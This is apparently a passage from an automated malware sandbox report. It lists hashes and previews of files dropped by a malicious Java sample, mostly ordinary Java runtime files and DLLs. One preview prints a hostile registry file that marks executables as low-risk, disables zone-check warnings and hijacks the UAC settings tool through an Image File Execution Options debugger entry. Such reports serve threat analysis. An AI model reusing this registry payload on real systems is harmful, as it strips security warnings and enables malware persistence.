                                                                                                                                                                                                                                  SHA-512:B4EFA729B2037E2BFC9A1A3ED279ED4B7D16EA9EBAFA748A860575EAB3226860145033DC680F9CDD43424E8374BCD3DB5E85D6EDD8E8A234A0036CBF07736C0A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27676
                                                                                                                                                                                                                                  Entropy (8bit):5.348605489538693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PJWwXczWquqtVciCtmtatLitmtJCtTt6tVtatNtgtitCtztHtxtMt8thtVRtTtsw:PqgrnuR0hTmEgGpF
                                                                                                                                                                                                                                  MD5:22C27D345F6CEFF99DE5FE515991C4BF
                                                                                                                                                                                                                                  SHA1:9C80DD9FFC77E2666281404F6452F5BD48D2BBCB
                                                                                                                                                                                                                                  SHA-256:45497C7CA76F29C6786A8835BC1925A5F6CD219403DCE807FB34B98A630212B3
                                                                                                                                                                                                                                  SHA-512:6875B8B8C2C29860DB7FEB7AFA95379D4EE1B027BA7F30547BB99C30BF11FFC7D69A914AB029D23C8CE2B2A36DFFDE5117E76BA639A6DA9B349B62538740F773
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:Windows Registry Editor Version 5.00..[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=dword:00000001....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=-....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=-....[HKEY_CURRENT_USER\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe].."debugger"="svchost.exe"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Poli
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45
                                                                                                                                                                                                                                  Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                                                                  MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                                                                  SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                                                                  SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                                                                  SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........................................J2SE.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ISO-8859 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3244
                                                                                                                                                                                                                                  Entropy (8bit):4.504275821607802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:9kjJXQSqgbiihCrRbo+Q/cV0rDcFBL3P0/r3:9cAaOi01E+xV0rDaBL3P0z3
                                                                                                                                                                                                                                  MD5:18589215C840FB114AC6767738D809CD
                                                                                                                                                                                                                                  SHA1:E646DCDD27F62ADE3854A86EDE2217F7FFBA477F
                                                                                                                                                                                                                                  SHA-256:C0AD9E4CA8DBC341F1311927FABA2372F66B281D00F33A86D6811223CCF4F059
                                                                                                                                                                                                                                  SHA-512:71B3BA2C55437B3F1655FDB0732B93400C6683161102954747AA5E48774AF4569B361A9C18F3B16C632A65E2BB34723FA1FEAE7AE0C47E42F0209CF19BBD4183
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Copyright . 1993, 2023, Oracle and/or its affiliates..All rights reserved...This software and related documentation are provided under a.license agreement containing restrictions on use and.disclosure and are protected by intellectual property laws..Except as expressly permitted in your license agreement or.allowed by law, you may not use, copy, reproduce, translate,.broadcast, modify, license, transmit, distribute, exhibit,.perform, publish, or display any part, in any form, or by.any means. Reverse engineering, disassembly, or.decompilation of this software, unless required by law for.interoperability, is prohibited...The information contained herein is subject to change.without notice and is not warranted to be error-free. If you.find any errors, please report them to us in writing...If this is software or related documentation that is.delivered to the U.S. Government or anyone licensing it on.behalf of the U.S. Government, the following notice is.applicable:..U.S. GOVERNMENT END US
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44
                                                                                                                                                                                                                                  Entropy (8bit):4.202972243293108
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:c3AXFshzYoQ6LJMXTn:c9hzYey
                                                                                                                                                                                                                                  MD5:2C311F1936F63834199DE94319A5CD8C
                                                                                                                                                                                                                                  SHA1:6C5F8A9EBAB689F905FEFE44ACA0A1F77D39E425
                                                                                                                                                                                                                                  SHA-256:2D5EC5B2984090D43BFB27C331B59BB537FBBBC9B5E015F1F94A5978372D293F
                                                                                                                                                                                                                                  SHA-512:E8A51E80F98098F601130D556AE42AF6A9162B382820A4D5AD7FEF9D68270626384B440E41E3208ACD0A61103404454FF5FBE6E0B5D1434ED759667ED7E5B8DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Please refer to https://java.com/otnlicense.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                                                  Entropy (8bit):4.197049999347145
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:c3AXFshzhRSkU:c9hzhgkU
                                                                                                                                                                                                                                  MD5:0F1123976B959AC5E8B89EB8C245C4BD
                                                                                                                                                                                                                                  SHA1:F90331DF1E5BADEADC501D8DD70714C62A920204
                                                                                                                                                                                                                                  SHA-256:963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
                                                                                                                                                                                                                                  SHA-512:E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Please refer to http://java.com/licensereadme.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                  Entropy (8bit):4.503253675672093
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YOc6XJKoQAEkBAzprMC9iRFGEjS1FfJGHmEhQhMy8yA/MGuPX+WJg6HY4AXe8rAv:e8EoQLkBAdrMC9iRVjMFwGyQhMBy4Hov
                                                                                                                                                                                                                                  MD5:F3AF2718F86B00497FA423046F50CEE6
                                                                                                                                                                                                                                  SHA1:0FF70AAD905069978C0D83728621FC982FD492FA
                                                                                                                                                                                                                                  SHA-256:4E4079BD53B742D9D6F18FBD06F743C28285F1E4B9FFD636D2D24A70A2EE7F00
                                                                                                                                                                                                                                  SHA-512:FFA6A3098182084D9D563274BD30C5F55EA0F7C9F9AB4DC8CD1664B971D0CF03BFC8061E19D1BDA6A4591B100A87B74F26AA1BDBFECCBC1EA195AF809A8C49FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:The licenses for Third Party components included with this product can.be found under the /legal/javafx subdirectory. Each component's license.is available as a separate markdown (.md) file.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                  Entropy (8bit):4.470612255387289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YOc6XJKoQAEkBAzprMC9iRFGEuFDKQ1FfJGHmBO8Ly8yA/MGujcWJg6HY4AXe8rg:e8EoQLkBAdrMC9iRVKlFwGBO8By4Hogk
                                                                                                                                                                                                                                  MD5:59E82B41579AD2E2016D98F191C8D5FF
                                                                                                                                                                                                                                  SHA1:BD9F7A797E0FCA53892F9FC5EA87727D8DA41DA5
                                                                                                                                                                                                                                  SHA-256:7D7336CC8FA87C4629EAC7F0EFCBF12E5C975AC9EE44CD1343A0EA68A813DDCA
                                                                                                                                                                                                                                  SHA-512:32393B417E62F1399C6F1754CC8F3001689593A6B59569885FDFE0F1478018C81222C8B82DADFC0E514659DAA01D819CE79FAA53969BEAEFD438D15C9DF5B9C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:The licenses for Third Party components included with this product can .be found under the /legal/jdk subdirectory. Each component's license is .available as a separate markdown (.md) file..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):955
                                                                                                                                                                                                                                  Entropy (8bit):5.088468206037393
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:INMTdqcxtK4jXQ5VaJ2gjQo4pDW94QDJn:TTdqIK4jXjJdso4V7O
                                                                                                                                                                                                                                  MD5:B292AE0FB1B4F20A7D0F8791AF97DB50
                                                                                                                                                                                                                                  SHA1:476FECD1D9B61151A1FF622454C8095E41CA5178
                                                                                                                                                                                                                                  SHA-256:B95219F315577A786EA61060252B1FCD8BBF1266003F3F045C5D1FE612DBE87B
                                                                                                                                                                                                                                  SHA-512:1BC45E9453F70ABF7625C3A0F6506C22CB3DE10CA4005A97DF460B14A174C0484E0994AF63978151CF5436EDAF77519151DD9A0606764E2426707457B13828A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<html>.<head>.<title>.Welcome to the Java(TM) Platform.</title>.</head>.<body>..<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>.<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime . Environment. This provides complete runtime support for Java applications. .<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> . Plug-in product which supports the Java environment inside web browsers. .<h3>References</h3>.<p>.See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product.documentation for more information on using the Java Plug-in product..<p> See the <a href=."http://www.oracle.com/technetwork/java/javase/overview/".>Java Platform</a> web site for . more information on the Java Platform. .<hr>.<font size="-2">.Copyright (c) 2006, 2023, Oracle and/or its affiliates. All rights reserved..</font>.<p>.</body>.</html>.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.843306475803262
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3f5b6WthWxWf9BvVVWQ4SWUWPxgKtkqnajOyr39+:3f5b6WthWkNW0lqyrc
                                                                                                                                                                                                                                  MD5:42A40EC9ADDF68F5B66878FED7C9A8A6
                                                                                                                                                                                                                                  SHA1:339A41043F7DD28CADF8CA6A578B292351EB3565
                                                                                                                                                                                                                                  SHA-256:8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
                                                                                                                                                                                                                                  SHA-512:84826C1C35DEFEBE8D5A3DD7EF8C14C8BCBDBC51AB34062F65565680D133AD5DF443F0F8BDB84D09838D1169B34092A06AAD3A795EE214252097022BEA83E4C6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: gcahfpmhcn.js, Detection: malicious
• Filename: FACTURA.jar, Detection: malicious
• Filename: FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exe, Detection: malicious
• Filename: Purchase Orders-Reg.jar, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen23.5328.29386.24001.exe, Detection: malicious
• Filename: SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe, Detection: malicious
• Filename: SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exe, Detection: malicious
• Filename: Swift Advice $31,470.00.jar, Detection: malicious
• Filename: 4.jar, Detection: malicious
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....A.m...........!......................... ...............................0......j.....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....A.m........:...T...T........A.m........d................A.m........$...........RSDS.WJ....@l.....*....api-ms-win-core-xstate-l2-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ....WJ....@l.....*......<9.....A.m.............A.m....................H...`...x...............I...x...................7...d...................api-ms-win-core-xstate-l2-1-0.dll.CopyContext.kernel32.CopyContext.GetEnabledXStateFeatures.kernel32
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20608
                                                                                                                                                                                                                                  Entropy (8bit):6.68243370783467
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:a51KAJhDgjmd0om+oPuqqvIYi1o0zPxh8E9VF0NyfhSq:TArD7G/RPuqqQYirPxWEFL
                                                                                                                                                                                                                                  MD5:D175B83196887F8655E9F363A7F96DCB
                                                                                                                                                                                                                                  SHA1:E5D57A7F98B622F8936965D013832804CDACAA6E
                                                                                                                                                                                                                                  SHA-256:708893FAC23F5CE8CEC5A70BF315DD92DA8D0A39C81EF6AA6AD79A984AF56BCA
                                                                                                                                                                                                                                  SHA-512:029679C68B19F05E0AA1A254E39FB233D8B34709E9CAF42E08316E420412DB44C714AD5ED7362233E1F479EFC402B8C306097ADC8BF872CE7B1987F50806F6B3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):141440
                                                                                                                                                                                                                                  Entropy (8bit):6.517487882695378
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:8xOWSOU82zuwaiEKrK57izD0O/7NY7wYLtyLdwFxnBiKzXHAE/qnvRhGmPtGeKQO:UORVPD0g0+KQMUQ
                                                                                                                                                                                                                                  MD5:D37273185598543240BEF397E7165555
                                                                                                                                                                                                                                  SHA1:84501840AF96EE948207E6D86DB8B8DDA3C383E3
                                                                                                                                                                                                                                  SHA-256:DEA7E9878D59640B2F0B53EA7977A9D4AA11E35E32E9D2BCC0D539FB59AF533F
                                                                                                                                                                                                                                  SHA-512:B3A22879B775FCF0438D9FB23F59EEB5BB3A35D125450521E6DA40EF03E5E74A94905265129FB20AD2967B45D276DFBC57E047BD386C14819E485CC1225221E3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):170624
                                                                                                                                                                                                                                  Entropy (8bit):6.725061320371206
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:I8tq5j1I/m9FRzefP2UADrWjXdpE5u0o+EH7eg+SSgpcC/ltFgxX:I8A5jK/URymDr+zE55E7bHK
                                                                                                                                                                                                                                  MD5:8A2486499C94AF35C171CA27D6C46053
                                                                                                                                                                                                                                  SHA1:8EF0B4AB966A885BA6C5BAE677EEC3C6854CFAB9
                                                                                                                                                                                                                                  SHA-256:D4DE3DDEB86432F14E3123F2BE6E599FC29534002CDC804EA808C1A638AC10FC
                                                                                                                                                                                                                                  SHA-512:622101FAF662262D04E8D138E6780A126414042D3516CDF169F8DAEE7C8D821BDC396321F538FCE41E0ED5CD8F4EB162718E8335CEB8020C38A6C4E8DA510182
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.773528673083833
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:icWthWLEWf9BvVVWQ4SWjbg4rmuUgxfzfqnaj0OqWq15:/WthWFN8g4GIrlo0A5
                                                                                                                                                                                                                                  MD5:501EF92789251F51312BD6D91EBB2E3A
                                                                                                                                                                                                                                  SHA1:2547C014A19CB0E06CE82F9132AB25898EE6B034
                                                                                                                                                                                                                                  SHA-256:213CDEFFC15C734E42565C90512491113652DE9E52694AE335131D0E24F91DF7
                                                                                                                                                                                                                                  SHA-512:C87327C7D8385C10B203133920D6BF0C945CD9F9CD7213C2F70C2A756A4EA0A42205D6DF5BD38B028F5CC41D1311B7EAAB8B340634F7C9B582255B8EFFBD389A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.823598871593883
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ItsWthWQWf9BvVVWQ4SWmHJ0T7ssmsqnajrQgvNFx:I+WthW1NRKss9lPQ8
                                                                                                                                                                                                                                  MD5:D6C4BBCC368C0A6FF00DE4A274CE8B37
                                                                                                                                                                                                                                  SHA1:C87FFE41CC22CF525A7DC4866B88FD98D1C47923
                                                                                                                                                                                                                                  SHA-256:45A155E9B60F068FBC3EA8DD73552905AFEAE49270BEA6BBCCB4AAD0AA696F2D
                                                                                                                                                                                                                                  SHA-512:2D3CFCB70E1E26156FCF5200A491419A48BBEC903C408FBCC4F6D7D5235DA627E6FB45678C47A241A1C7D3C159300955B535086BBE27713EBAA463E79287F5B8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.79323921043045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:70WthW3Wf9BvVVWQ4SWFfOwsmsqnajrQjtFJcnn1:70WthWKNMs9lPQjDM1
                                                                                                                                                                                                                                  MD5:247EE0EC4475C244EFC4204B4DD0F6DA
                                                                                                                                                                                                                                  SHA1:A05C0D6A8EB1D76642EAF38A316785394F43B737
                                                                                                                                                                                                                                  SHA-256:05BACCF67FC6360068A9836A1A5EBF0E62697E92990665A6B73CE6C8A4A1B633
                                                                                                                                                                                                                                  SHA-512:51E1D4EDFD44908F81498506B007DBC25DD1F88440FD06B692EC90863F100DD8DB196B890520460C9B41F571ABE828D54085148C71714F32DBDDEA01CD8C597B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11224
                                                                                                                                                                                                                                  Entropy (8bit):6.8026317072916545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RWthW9Wf9BvVVWQ4SWPIxf2LfvXqnajJ6Hp/u:RWthW4Npxf2LXll6Hdu
                                                                                                                                                                                                                                  MD5:2E73BB0452F6C5C9DE3157DFF1997B65
                                                                                                                                                                                                                                  SHA1:BF2D5386113120823245F35FAABC642107707D63
                                                                                                                                                                                                                                  SHA-256:1C2705257C272C7736EF10B81D65F28FC76B4D34412B8DB72F5A23B530D847E8
                                                                                                                                                                                                                                  SHA-512:6FD865037DE04219EE01375B3DA9BEEC1EC29720D8CA16094AD64BD089CC7F8B47A025A0D1F746DE7E718492EF1D97E9622F886BDCC3DD76771DD13D76CB3693
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.851667373833437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14816
                                                                                                                                                                                                                                  Entropy (8bit):6.692569650542529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.825425081064529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.918894098613097
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.81487015100869
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.7728246345411405
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.794571473352183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.765880903831318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cvuBL3B5LgWthWEWf9BvVVWQ4SWZCA3vktkqnajOyr39anu:cvuBL3BCWthWxNelqyrf
                                                                                                                                                                                                                                  MD5:922CF0ACE984C8FFEE4F5D505CE5D575
                                                                                                                                                                                                                                  SHA1:3296FAF55DBBBDFF04385278E6BDD8F383D64408
                                                                                                                                                                                                                                  SHA-256:BBDFFC7563C7E4EABCE9FC8FF8A3160C7E4D75D5BD50786CC6621E131F668D40
                                                                                                                                                                                                                                  SHA-512:A812719A2C11B9C0BD2AEF07F709DF83E6EEA5F8BE8FB1E348C91A4340DD22D5603CC3B555CC26548E6BEA926C66A9F2A96FCE6B2C9BDC55213A81526CF09403
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
